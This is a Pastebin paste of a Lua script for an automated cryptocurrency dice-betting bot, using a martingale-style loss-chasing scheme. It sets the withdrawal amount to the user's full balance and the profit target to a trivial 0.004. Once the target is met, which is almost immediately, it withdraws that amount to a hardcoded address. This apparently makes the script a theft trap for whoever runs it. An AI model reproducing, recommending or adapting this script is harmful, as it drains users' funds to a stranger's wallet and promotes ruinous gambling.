Advertisement
coinwalk

dicebot scripting

Nov 29th, 2018
259
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.36 KB | None | 0 0
  1. chance = 90
  2. bethigh = true
  3. basebet = balance/5500
  4. nextbet = basebet
  5.  
  6. amount=balance
  7. profittarget=0.004
  8. stoptarget=0
  9.  
  10. function dobet()
  11. if (win) then
  12. chance = 90
  13. basebet = balance/5500
  14. nextbet = basebet
  15. else
  16. if chance == 45.00 then
  17. nextbet = previousbet * 1.9
  18. else
  19. chance = 45.00
  20. nextbet = basebet
  21. print("-----------------------------------------")
  22. print(" ")
  23. print("profit") print(profit) print("profit")
  24. print(" ")
  25. print("Balancel") print(balance)
  26. print(" ")
  27. print("-----------------------------------------")
  28. resetseed();
  29. end
  30. end
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37. if balance <= stoptarget then
  38. stop()
  39. end
  40.  
  41. if (balance) >= profittarget then
  42.  
  43. ching()
  44. alarm()
  45. print("Balance ") print(balance)
  46. print(" ")
  47. print("TARGET made!!!")
  48. print(" ")
  49. print("TARGET made!!!")
  50. print(" ")
  51. print("TARGET made!!!")
  52. print(" ")
  53. print("TARGET made!!!")
  54. print(" ")
  55. print("profit ") print(profit) print(" profit")
  56. print(" ")
  57. print("Withdrawing Target Amount ") print(amount) print(" DOGE")
  58.  
  59.  
  60. withdraw(amount,"1FJswJKhsevzXFZyXFntmsPrL5JZTppf94")
  61.  
  62. print(" ")
  63. print("you have it withdrawn BRO!!!")
  64.  
  65.  
  66. resetseed();
  67.  
  68.  
  69.  
  70. end
  71.  
  72. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement